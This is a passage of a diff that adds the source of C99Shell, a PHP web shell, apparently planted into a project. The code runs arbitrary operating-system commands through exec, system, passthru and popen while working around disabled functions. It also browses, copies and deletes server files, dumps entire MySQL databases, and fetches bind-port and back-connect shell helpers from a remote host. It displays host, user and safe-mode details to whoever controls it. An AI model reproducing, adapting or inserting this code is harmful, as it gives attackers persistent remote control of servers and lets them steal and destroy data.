+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return FALSE;}
+}
+}
+
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
